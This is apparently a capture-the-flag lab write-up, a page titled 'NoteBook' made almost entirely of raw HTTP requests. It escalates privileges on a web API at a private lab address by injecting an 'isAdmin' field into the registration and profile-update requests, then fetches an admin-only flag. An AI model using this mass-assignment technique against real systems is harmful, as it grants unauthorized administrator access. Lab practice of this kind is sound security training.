Labs | Notion

NoteBook

POST /api/register HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 82

{"username":"remo",
"email":"[email protected]","password":"remo123$","isAdmin":true}

Now let’s login

POST /api/login HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Content-Length: 64

{
"email":"[email protected]","password":"remo123$","isAdmin":true}

Now let’s update the profile!

PUT /api/profile HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
x-auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxNSwiZW1haWwiOiJyZW1vQHJlbW8uY29tIiwiaXNBZG1pbiI6ImZhbHNlIn0sImlhdCI6MTc2ODYxOTk1NiwiZXhwIjoxODU1MDE5OTU2fQ.4HDKShkBgiry66eP1Kyc6-5GGQ-zTpqsWM79nebp0II
Connection: keep-alive
Content-Type: application/json
Content-Length: 62

{
"username":"remo","email":"[email protected]","isAdmin":"true"}

Now let’s get the flag!

GET /admin/flag HTTP/1.1
Host: 192.168.238.230:5000
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
x-auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxNSwiZW1haWwiOiJyZW1vQHJlbW8uY29tIiwidXNlcm5hbWUiOiJyZW1vIiwiaXNBZG1pbiI6InRydWUifSwiaWF0IjoxNzY4NjIxMDE0LCJleHAiOjE4NTUwMjEwMTR9.anVWK8McWSfDkWAvEkCtPgC61XK6LIBMOkQWX315VU0
Connection: keep-alive
Content-Type: application/json
Content-Length: 0

Flag: a082e612de1e2829c636cc0a6496ca7b